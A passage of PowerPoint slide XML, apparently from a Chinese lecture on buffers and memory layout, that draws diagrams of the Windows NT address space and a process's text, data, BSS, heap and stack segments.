            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>FFFFFFFFH</a:t>
            </a:r>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sz="2800" dirty="0"/>
              <a:t>00000000H</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2627784" y="1628800"/>
            <a:ext cx="4536504" cy="4248472"/>
            <a:chOff x="2627784" y="1628800"/>
            <a:chExt cx="3384376" cy="3096344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2627784" y="1628800"/>
              <a:ext cx="33843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操作系统使用（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>2GB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2627784" y="2420888"/>
              <a:ext cx="33843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防止跨用户</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>系统边界传输数据（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>64kB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2627784" y="3212976"/>
              <a:ext cx="33843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进程空间（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>128kb-2GB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2627784" y="3933056"/>
              <a:ext cx="33843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用户捕捉</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>NULL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>指针不可读写</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>（</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>64kB</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3203848" y="5877272"/>
            <a:ext cx="3384376" cy="7200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WinNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>地址空间</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缓冲区与内存分布</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="1339850"/>
            <a:ext cx="2449513" cy="1871663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1602110" y="4005263"/>
            <a:ext cx="1655762" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>文本（代码）段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1603697" y="3211513"/>
            <a:ext cx="1655763" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>数据段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1602110" y="2420938"/>
            <a:ext cx="1655762" cy="790575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>堆栈段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522610" y="2065338"/>
            <a:ext cx="1336675" cy="355600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>内存低地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="522610" y="4873625"/>
            <a:ext cx="1336675" cy="355600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>内存高地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1243335" y="2563813"/>
            <a:ext cx="0" cy="2160587"/>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1" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="616272" y="2871788"/>
            <a:ext cx="482600" cy="1781175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="eaVert"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>内存递增方向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="3716338"/>
            <a:ext cx="2449513" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>初始化数据段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="3211513"/>
            <a:ext cx="2449513" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="92D050"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>非初始化数据段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>(BSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="1268413"/>
            <a:ext cx="2376488" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>堆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>(Heap)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4481835" y="2636838"/>
            <a:ext cx="2449512" cy="647700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>栈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>(stack)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4554860" y="2708275"/>
            <a:ext cx="2447925" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="1843088"/>
            <a:ext cx="2449513" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7344097" y="1484313"/>
            <a:ext cx="1458913" cy="357187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>堆的增长方向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6985322" y="3211513"/>
            <a:ext cx="485775"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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6985322" y="1339850"/>
            <a:ext cx="485775"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a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7363147" y="2784475"/>
            <a:ext cx="1457325" cy="357188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>栈的增长方向</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Line 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7201222" y="1339850"/>
            <a:ext cx="0" cy="712788"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7201222" y="2262188"/>
            <a:ext cx="0" cy="94932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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3257872" y="3213100"/>
            <a:ext cx="1223963" cy="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25" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3257872" y="1341438"/>
            <a:ext cx="1296988" cy="10795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26" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3257872" y="4005263"/>
            <a:ext cx="1296988" cy="2159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27" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="5732463"/>
            <a:ext cx="2449513" cy="503237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内核数据代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858322" y="5732463"/>
            <a:ext cx="1800225" cy="371513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x80000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6786885" y="5372100"/>
            <a:ext cx="1944687" cy="371513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7FFFFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4553272" y="5732463"/>
            <a:ext cx="3960813" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="sq">
            <a:solidFill>
              <a:srgbClr val="6600FF"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4553272" y="5227638"/>
            <a:ext cx="2449513" cy="504825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CCCCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>PEB&amp;TEB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
